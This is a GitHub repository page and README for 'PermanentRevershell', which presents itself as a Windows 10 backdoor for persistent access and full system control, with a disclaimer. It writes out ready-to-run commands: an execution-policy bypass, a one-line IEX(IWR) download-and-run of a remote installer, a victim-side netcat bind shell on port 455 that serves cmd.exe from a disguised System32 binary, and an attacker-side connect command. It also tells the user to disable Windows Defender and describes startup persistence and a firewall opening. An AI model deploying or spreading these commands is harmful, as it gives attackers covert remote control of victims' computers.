Skip to content

"PermanentRevershell: A potent Windows 10 backdoor providing persistent access and full system control. Explore its capabilities today!"

License

Notifications You must be signed in to change notification settings

alariordas/PersistentReverseShell-Win10Backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

62 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PermanentRevershell-win10backdoor

"PermanentRevershell: A potent Windows 10 backdoor providing persistent access and full system control. Explore its capabilities today!" image

Disclaimer: Use Responsibly

This tool is provided for educational and legitimate security testing purposes only. The author (alariordas) does not condone or endorse any unauthorized or malicious use of this tool. Any actions and activities carried out using this tool are the sole responsibility of the user.

By downloading, using, or distributing this tool, you acknowledge and agree to use it in compliance with all applicable laws and ethical guidelines. Improper or unlawful use of this tool is strictly prohibited, and the author will not be held responsible for any consequences arising from such actions.

Please exercise caution and always obtain proper authorization before using this tool on systems or networks that you do not own or have explicit permission to test.

Use this tool responsibly and for legitimate purposes only.

Note: It is important to be aware of and comply with the laws and regulations governing cybersecurity and ethical hacking activities in your jurisdiction. Unauthorized access or malicious activities may result in legal consequences.

Netcat Auto-Installer for Windows

This script automates the installation of Netcat on Windows systems. Netcat is a versatile networking utility that can be used for various purposes, including network testing and security assessments. Please use this script responsibly and only on systems and networks for which you have proper authorization.

Features

  • Downloads and extracts the Netcat ZIP file to a temporary location.
  • Moves the nc.exe binary to the System32 directory, enhancing its stealth.
  • Sets up Netcat to run at system startup for persistent access.
  • Enables a firewall rule to allow incoming connections on port 455.
  • Removes temporary files after successful installation

Prerequisites

Before using this script, ensure that you have:

  • Windows operating system.
  • Administrator privileges.
  • Windows Defender desactivated during the execution of the script
  • PowerShell enabled for script execution. You can do this by running:
Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force

Or Press Windows + R and type:

powershell -nop -ep bypass -c IEX(IWR Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force -UseBasicParsing);

Usage

Automated Installation

  1. Press Windows + R to open the Run dialog.
  2. Type powershell.exe IEX(IWR https://raw.githubusercontent.com/alariordas/PermanentRevershell-win10backdoor/main/ncinstaller.ps1 -UseBasicParsing); and press Ctrl + Enter to open PowerShell with Administrator privileges.
powershell.exe  IEX(IWR https://raw.githubusercontent.com/alariordas/PersistentReverseShell-Win10Backdoor/main/ncinstaller.ps1 -UseBasicParsing);

The script will be executed automatically. However, please note that it may not work on all systems. If you encounter issues, you may need to adapt the script to the target system's properties. This will start the process if in the victim side it's not working

powershell -ExecutionPolicy Bypass -Command "Start-Process 'C:\Windows\System32\msnmsgr.exe' -ArgumentList '-Ldp 455 -e cmd.exe' -NoNewWindow"

In the Attacker side

Execute this command in the terminal, replace explample.com with the victim ip or domain

netcat -z -v example.com 455

About

"PermanentRevershell: A potent Windows 10 backdoor providing persistent access and full system control. Explore its capabilities today!"

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published